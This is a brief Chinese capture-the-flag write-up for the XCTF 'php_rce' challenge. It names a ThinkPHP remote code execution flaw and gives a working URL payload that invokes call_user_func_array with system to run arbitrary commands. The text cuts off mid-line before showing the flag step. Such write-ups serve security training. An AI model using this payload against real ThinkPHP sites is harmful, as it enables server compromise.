XCTF-高手进阶区:php_rce

题目: 看到题目就知道是thinkphp的远程执行漏洞 payload: index.php默认的话能够不须要php index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php代码 注:代码后面可不加分号 得到flag:web index.php?s=in
相关文章
相关标签/搜索